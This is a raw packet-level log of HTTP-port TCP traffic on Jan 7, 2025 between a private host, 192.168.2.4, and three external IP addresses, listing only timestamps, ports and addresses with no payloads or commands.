Jan 7, 2025 10:08:23.645591021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.645601988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.645612955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.645622015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.645632982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.645632982 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.645651102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.645682096 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.646258116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646267891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646276951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646301985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646311045 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.646316051 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646328926 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646337986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646344900 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.646373987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.646397114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646441936 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646451950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:23.646476984 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:23.646490097 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:24.092771053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:58.166512966 CET	49860	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:58.166974068 CET	50016	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:58.171591997 CET	80	49860	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:58.171714067 CET	49860	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:58.171756029 CET	80	50016	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:58.171854019 CET	50016	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:58.179492950 CET	50016	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:58.184355974 CET	80	50016	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:58.874619007 CET	80	50016	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:58.874726057 CET	50016	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:59.058588982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.063374996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.063450098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.063891888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.068759918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745405912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745419025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745471954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.745513916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745526075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745536089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745563984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.745568037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745577097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745579958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.745596886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745606899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745610952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.745620966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.745647907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.745661020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.750289917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.750354052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.750358105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.750370979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.750382900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.750406981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.750427008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.750648975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.750807047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.866350889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866364002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866419077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.866475105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866506100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866517067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866549969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.866571903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.866785049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866796017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866844893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.866982937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.866996050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867007017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867058039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.867297888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867322922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867335081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867377043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.867400885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.867681980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867695093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867707014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867717981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.867742062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.867770910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.868205070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868215084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868269920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.868319035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868330956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868343115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868376970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.868393898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.868696928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868714094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868726969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.868772030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.871212959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.871232033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.871315956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.879668951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.879679918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.879694939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.879704952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.879731894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.879766941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987448931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987462997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987474918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987524033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987550974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987569094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987617016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987634897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987647057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987657070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987679958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987698078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987723112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987732887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987772942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987782955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987791061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987827063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.987895012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987910986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987921953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.987970114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.988018990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.988053083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.988100052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.988105059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.988147020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.988188028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.988190889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.988200903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.988213062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.988246918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.988265038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989248991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989259958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989324093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989370108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989382982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989393950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989418983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989440918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989458084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989469051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989509106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989541054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989552021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989583015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989597082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989622116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989633083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989691019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989717960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989727020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989737988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989759922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989773989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989886045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989896059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989908934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.989947081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989959955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.989980936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.990024090 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.990056038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.990067959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.990080118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.990102053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.990125895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.990262985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.990273952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.990286112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.990325928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.990355015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992342949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992355108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992366076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992407084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992419004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992419958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992433071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992454052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992480993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992496014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992506981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992517948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992528915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992563963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992587090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992605925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992618084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992630959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992644072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992675066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992855072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992866993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992877960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:08:59.992906094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:08:59.992937088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.108516932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108539104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108550072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108567953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108580112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108589888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108613968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.108674049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.108699083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108709097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108748913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.108906984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108925104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108937025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108951092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.108964920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.108964920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.108989954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.108994007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109015942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109029055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109070063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109082937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109100103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109117985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109123945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109129906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109141111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109150887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109154940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109172106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109181881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109193087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109227896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109251976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109296083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109313011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109324932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109334946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109344006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109357119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109389067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109471083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109482050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109493017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109538078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109580994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109621048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109631062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109657049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109664917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109814882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109829903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109869957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109895945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109899998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109910011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109941959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109955072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.109971046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109980106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109985113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.109992981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110028028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.110047102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.110256910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110265970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110306978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.110383034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110392094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110402107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110425949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.110434055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110445023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110462904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.110487938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.110624075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110631943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.110677958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113432884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113449097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113464117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113472939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113482952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113508940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113533020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113535881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113548040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113557100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113584995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113586903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113595963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113601923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113604069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113612890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113636971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113661051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113701105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113711119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113720894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113730907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113764048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113780975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113858938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113868952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113878012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113923073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.113941908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113953114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113991022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.113997936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114000082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114011049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114038944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114052057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114206076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114217043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114232063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114242077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114250898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114259958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114265919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114269972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114284992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114290953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114301920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114311934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.114320993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114330053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114360094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.114383936 CET	80	50017	31.41.244.11	192.168.2.4
